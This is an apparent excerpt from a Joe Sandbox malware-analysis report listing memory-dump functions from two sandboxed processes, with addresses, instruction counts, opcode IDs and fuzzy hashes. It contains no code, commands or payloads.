                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af2ab46885050b59af3e9d233e2ed6803a00b6c4e6800c334bf2cc272ecb872e
                                        • Instruction ID: 7134cf27d0d9a7a3ff651fcc0b3ea38a03ccfb60ac9432f776da244e314674cd
                                        • Opcode Fuzzy Hash: af2ab46885050b59af3e9d233e2ed6803a00b6c4e6800c334bf2cc272ecb872e
                                        • Instruction Fuzzy Hash: 76113835B1EA9E8FE7129FA8CC212E97771EF86710F054573C064DB1E3DA3826098791
                                        Function 00007FFD9B885D16 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab8e0b7e1f5f5f92a63a4c013c800203c677291b77320fe0a3da7f7b4ae19c96
                                        • Instruction ID: fa75c47e44ec2e4dd84c5c9aa2996dc41a00e328cbfa7d1757fb084d388a8a7f
                                        • Opcode Fuzzy Hash: ab8e0b7e1f5f5f92a63a4c013c800203c677291b77320fe0a3da7f7b4ae19c96
                                        • Instruction Fuzzy Hash: E1219770E1AA2E8FDBB4DB55C8647E8B6B1FB18341F5100F9D41DA26A1DB786B809F01
                                        Function 00007FFD9B880C40 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be96cb78b6dfa0c85de3e3d0387e710c82f66796f09e05b550ee1cd78afae5d6
                                        • Instruction ID: 6939d0202e18e6c02086249bb6914bf0364be1ac7ee063a00b767c0a5ddbd118
                                        • Opcode Fuzzy Hash: be96cb78b6dfa0c85de3e3d0387e710c82f66796f09e05b550ee1cd78afae5d6
                                        • Instruction Fuzzy Hash: C3112375A0EA9E8FE7129FA8C8212E97B71EF46710F0545B3C060DB1E3CA386609C791
                                        Function 00007FFD9B885D1B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction ID: 92df261e5e56e9e99c53031ce90ed44b78376fb860ceeb56d3c022a4e53dcc9e
                                        • Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction Fuzzy Hash: F3218570E1A62D8FDBB5DB65C8587E8B6B1EF18301F5140F9941DA22A1DB386B84DF00
                                        Function 00007FFD9B880C48 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64e557a01f25e7c644702584aa9c69e66a18a6f9d0dd5b82b3013fcbdd23404b
                                        • Instruction ID: 0ec47a9a35063b5438fa832bee748113a1a79f76199bdc8531e255ad78665f60
                                        • Opcode Fuzzy Hash: 64e557a01f25e7c644702584aa9c69e66a18a6f9d0dd5b82b3013fcbdd23404b
                                        • Instruction Fuzzy Hash: 5E110E71A0E68E8FE712AFA8CC212A97B71EF46700F0542B7C060DB1E2CA386614C781
                                        Function 00007FFD9B880C50 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3f7808a8795aff85cfe0838d6a2fdaa1b32b5a2e4c247315523a92af324b352
                                        • Instruction ID: 31d944e61d3650ccdacb7d20d869de9d810fbd020e31738fa017281a826c2597
                                        • Opcode Fuzzy Hash: c3f7808a8795aff85cfe0838d6a2fdaa1b32b5a2e4c247315523a92af324b352
                                        • Instruction Fuzzy Hash: 23010470E0E68E8FE7129BA8CC201A97B71FF06700F0542B3C060DB1E3CA386614C781
                                        Function 00007FFD9B880B9D Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b8ac9cab6950925a942200b3b13b1d0c810bf1dc5f39bf167a2c0a28718b583
                                        • Instruction ID: fcf3864f6922f3f6315e34b4bba865caaaf09cc18c621a9b5bce77c53a5f1a89
                                        • Opcode Fuzzy Hash: 7b8ac9cab6950925a942200b3b13b1d0c810bf1dc5f39bf167a2c0a28718b583
                                        • Instruction Fuzzy Hash: E401D230A2864E8FCF84EF58C881AA97BE0FB58304F010565E859D3254C730E961CB81
                                        Function 00007FFD9B8806A5 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9454e286c937ef338cef66aea9e492e8c5da556f64596370495a0ee2e10a3da8
                                        • Instruction ID: df6e02948d20398358818a46c0a49fa7361cf468bda207c5e486f0c88adb7804
                                        • Opcode Fuzzy Hash: 9454e286c937ef338cef66aea9e492e8c5da556f64596370495a0ee2e10a3da8
                                        • Instruction Fuzzy Hash: B2F03030A16A0E9FEF94EF98D8596EE7BE0FF58300F110536E41CC21A0DA34A690C781
                                        Function 00007FFD9B881300 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bf09ff2bd24c779059cc3e44342e90ab685ef5fff63e3d66dbbd00ae61a1a8
                                        • Instruction ID: 19967951b21728b5968b3a300174383272e792a3293df820e3425aa618ac1566
                                        • Opcode Fuzzy Hash: 16bf09ff2bd24c779059cc3e44342e90ab685ef5fff63e3d66dbbd00ae61a1a8
                                        • Instruction Fuzzy Hash: FDF0BD30A1894DDFDF94EF58C449AAA7BF0FF68304F0104A6F818C3264D634E594CB81
                                        Function 00007FFD9B8806C8 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction ID: 73dea8ba1599c6944f489e8762f7e62bd6262b1fe0ef9e7ecec8cb3a66b01ed8
                                        • Opcode Fuzzy Hash: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction Fuzzy Hash: 91F01C3091594E9FEF94EFA8C8596EA7BE0FF18304F010576E81DD21A4DB34A6A0CB81
                                        Function 00007FFD9B881685 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 861c413314a845d854fab3cddfd306ccf832981e849265e2dc6511061f009ac7
                                        • Instruction ID: aef364c387d7f36f1aecd88dc9f555a878196a2a2448d7df5cc717add8be6d89
                                        • Opcode Fuzzy Hash: 861c413314a845d854fab3cddfd306ccf832981e849265e2dc6511061f009ac7
                                        • Instruction Fuzzy Hash: 99F0A935B09A4D9BCB20EFA8D9006EE7BA0FF84300F000476E06DC2090EA34A728C741
                                        Function 00007FFD9B880CCF Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e660f0f74f8aeb7584f1f1294d4ffdcd2f30a735bbd07e71f0a663f65fdc695
                                        • Instruction ID: 8643a2d8ebde5884a5d2dac3299fb0e52e4dcc2c433162235c2ff5df8bafffdf
                                        • Opcode Fuzzy Hash: 2e660f0f74f8aeb7584f1f1294d4ffdcd2f30a735bbd07e71f0a663f65fdc695
                                        • Instruction Fuzzy Hash: 35F06270B1E91A8BE758DF94C8546FD77B1FF58701F04067AD029932A2CB786640CB81
                                        Function 00007FFD9B8870E6 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction ID: f71c2c8c3e271018d5b9cbdc956c1cda60d83960aaca81e3b32d14d19cfef341
                                        • Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction Fuzzy Hash: 45F0B770A0A9198BFB64AB94C8543A9B7A0EF89300F2150AD915EA3391DE385A858F45
                                        Function 00007FFD9B886B59 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
                                        • Instruction ID: 5d63c56915812d337c7653ff9f1698c0f559071763a5be183b61c3ab26af03af
                                        • Opcode Fuzzy Hash: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
                                        • Instruction Fuzzy Hash: 0AE08631E24A5C8AEBA4DB10C854AEC73B1EF58300F4045FB800EB1094CD7416814F00

                                        Non-executed Functions

                                        Function 00007FFD9B880862 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f88c57d2402203c693e4c3b98e45913b34b441d7b3aef494cc49bac5d1332a2
                                        • Instruction ID: 5d8f84ad3b42ff77c2b81e6549fbf622a07963e57cc1047f67bbfbc6b63b53af
                                        • Opcode Fuzzy Hash: 7f88c57d2402203c693e4c3b98e45913b34b441d7b3aef494cc49bac5d1332a2
                                        • Instruction Fuzzy Hash: 3D715270A08A4D8FEFA8DF58C855BE97BE1FF59310F10412AE84EC7291DB749985CB81
                                        Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction ID: cb506401c19c3d78cfa35dfef3a4f93b4952e48a106794677a7e335d3bb11642
                                        • Opcode Fuzzy Hash: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction Fuzzy Hash: F941D087B1843785E31E33FD79299EC6B40DF8433DB0846B7E16E8A0C75D98648792E5

                                        Executed Functions

                                        Function 00007FFD9BAB0D70 Relevance: .3, Instructions: 269COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0ac9f4ec3ee164dec290110a6d3807dfba8cdab611dcf9f69997322d83b6a00
                                        • Instruction ID: 1856129a3021975ccdde7760f34173295aea8abd87568ec1bd45d1b15848ca88
                                        • Opcode Fuzzy Hash: e0ac9f4ec3ee164dec290110a6d3807dfba8cdab611dcf9f69997322d83b6a00
                                        • Instruction Fuzzy Hash: 38A1C071A08A9D8FE798DB68C8657AABFE1FF59314F0101BED059D72D6CB781811CB40
                                        Function 00007FFD9BAB4DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        • Opcode ID: 922c7bc4b7deeeb40792eacae21392b13da1b2554942eec88f5c80031628d4ce
                                        • Instruction ID: eeb7cbbc54d1b554a1d80b65491af2633bf7db5e7543fcbdce828eb1925e2885
                                        • Opcode Fuzzy Hash: 922c7bc4b7deeeb40792eacae21392b13da1b2554942eec88f5c80031628d4ce
                                        • Instruction Fuzzy Hash: BA112830E0596D8FEB74DB18CC546E9B7B1EF94316F1082E6D41DE22A5DE782A818F40
                                        Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 181COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81f522428292ea1b5a222fe0c0f67442bc6932267a4501beb722ce4caa25f9a6
                                        • Instruction ID: 9859a2bc3ce4a1d9a71865ca9daf0b791604623d5f84072b1d3e37e2d9e605a9
                                        • Opcode Fuzzy Hash: 81f522428292ea1b5a222fe0c0f67442bc6932267a4501beb722ce4caa25f9a6
                                        • Instruction Fuzzy Hash: A951A131A0855D8FDB54FFA8D4A5AFDBBA0EF58329F0405BBE44DD7196CE24A841CB80
                                        Function 00007FFD9BAB0998 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c36f9c9adcba557ca12cc98ec51069547802e9672720e66686d13625c621136
                                        • Instruction ID: fbfbe860d34ca1d5a0ef9c0da5bc4c8d241a06d70dd25c3f32bdfbf42e315d47
                                        • Opcode Fuzzy Hash: 8c36f9c9adcba557ca12cc98ec51069547802e9672720e66686d13625c621136
                                        • Instruction Fuzzy Hash: B7410870A1495D8FDB94EF98C4A4AEDBBE1FF68305F50017AE40DE32A5DB74A9418B40
                                        Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bc49a15b77fba144ed4ac7255bfd17340bf0653153b65ce59ad945b49dd529f
                                        • Instruction ID: adf38bb036f1cc51eeeaca99dac1c8334db2bbde0c6bc422e5cae47a2905dd00
                                        • Opcode Fuzzy Hash: 4bc49a15b77fba144ed4ac7255bfd17340bf0653153b65ce59ad945b49dd529f
                                        • Instruction Fuzzy Hash: 26210635B0E2AE4FE332ABA9CC212ED7B60EF42310F0645B3C1649B1E2D77816058B95
                                        Function 00007FFD9BAB5F11 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84ff16b8ad6775977ae81915814047038aa6eca39920bad7ba79945971df8dfa
                                        • Instruction ID: 8173d0b59fac6d7c9e170c4d2a7cfb0fd65da8ed33192c42b07ead3a6af080ac
                                        • Opcode Fuzzy Hash: 84ff16b8ad6775977ae81915814047038aa6eca39920bad7ba79945971df8dfa
                                        • Instruction Fuzzy Hash: ED319370E0D62D8EEBB9DB55C8687E8B7B1FB55301F4141E9D01DA22A1DBB86AC4CF01
                                        Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7b30d6c0e29c31e7e2642debadff862f3347b4f52198a60e3c9e2737b4b5db4
                                        • Instruction ID: 6704e071f0789f29deda4c12d2919e5cc5804ea2b7609e89cf7044c2fc5883f5
                                        • Opcode Fuzzy Hash: a7b30d6c0e29c31e7e2642debadff862f3347b4f52198a60e3c9e2737b4b5db4
                                        • Instruction Fuzzy Hash: E611E631B0E6AD4FE722ABA4C8212E97B70EF42310F0545B3D154DB1E3DA7816058B95
                                        Function 00007FFD9BAB5D16 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84cf3d99fd2084313b6b807910f02623ad2f49de7cbef0bfb3e1db16cacbf1ad
                                        • Instruction ID: eadb2ce2c04f9b318e0cfc27543dbd33df3ad60f40c363f20002085847b76467
                                        • Opcode Fuzzy Hash: 84cf3d99fd2084313b6b807910f02623ad2f49de7cbef0bfb3e1db16cacbf1ad
                                        • Instruction Fuzzy Hash: 9B21C670E0A62E8EEBB4DB55C8647E8B7B1FB15301F1141F9D41DA26A1DBB87B818F01
                                        Function 00007FFD9BAB5D1B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction ID: e373fefb8118e1e4e032d9954f87116d46e1461a261373e44bf138f7d0cc0d65
                                        • Opcode Fuzzy Hash: f8c01a835f249f9da2b3ff043b09454a264a4dbe9e4be3c5f3f01f57867e94aa
                                        • Instruction Fuzzy Hash: 8321A370E1A23D8EDBB5DB65C8687A8B6B1EB15301F4141FA941DA22A1DB786B80DF00
                                        Function 00007FFD9BAB0C40 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0b67b6f4cc9080bd951245dfe77c902e5d6131c09df327e97d9006b11de080a
                                        • Instruction ID: abe550e493584946438b6431de6a45422229730cac93d55787e35477ceeb6418
                                        • Opcode Fuzzy Hash: f0b67b6f4cc9080bd951245dfe77c902e5d6131c09df327e97d9006b11de080a
                                        • Instruction Fuzzy Hash: 7B110631A0E29D8FE722ABA4C8202E97B70EF42310F0545B3D155DB1E3CB786604CB95
                                        Function 00007FFD9BC72799 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction ID: 1b15e5ce6b0ccec9f3a78a3dd5d8ada7d1fc4d914b1a4c59bdf80ff092356090
                                        • Opcode Fuzzy Hash: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction Fuzzy Hash: 6D118E3090968D8FCB85DF68C8559EE7BF0FF29300F0501AAE859C71A1DB34AA54CB81
                                        Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2306085774c4552d7ed512af24e226455c108d59ef2a2e3662e49d95f4b268df
                                        • Instruction ID: 54cb4bab3fed56d3cb1db31087902c3bd51bc2493aafcb5316088dcfb1b14692
                                        • Opcode Fuzzy Hash: 2306085774c4552d7ed512af24e226455c108d59ef2a2e3662e49d95f4b268df
                                        • Instruction Fuzzy Hash: 0F11E571A0E29D8FE722ABA4C8202E97B70AF42310F0542B7D0559B1E3CB786614CB85
                                        Function 00007FFD9BC72949 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction ID: 7a062826f8d3951e7cdc9bc600baac91d3152c9d4a29158891f94d87fa9ca437
                                        • Opcode Fuzzy Hash: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction Fuzzy Hash: FE01407090978D8FDB45DF68C8959D97FF0FF19300F0501AAE459C71A2DB34A995CB41
                                        Function 00007FFD9BC72AE9 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction ID: 3572712e38e6e604210dd2208e439468f061795f8d5acd80c7494d14548d9188
                                        • Opcode Fuzzy Hash: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction Fuzzy Hash: C6015E30908A4D8FCF85EF68C858AAE7BF0FF29301F05019BE418D72A1DB349594CB40
                                        Function 00007FFD9BC71A69 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd5b1e82767258a690f2b43abeb09b8fd7fe6bfff29ca4008a9597c0b10d3500
                                        • Instruction ID: 802eba5e41ba9e2668b5599d645e074e4ada710bbbca1c7847897cfec5ff23ff
                                        • Opcode Fuzzy Hash: cd5b1e82767258a690f2b43abeb09b8fd7fe6bfff29ca4008a9597c0b10d3500
